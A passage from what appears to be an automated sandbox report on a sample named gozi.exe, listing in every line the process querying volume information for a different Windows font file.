Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
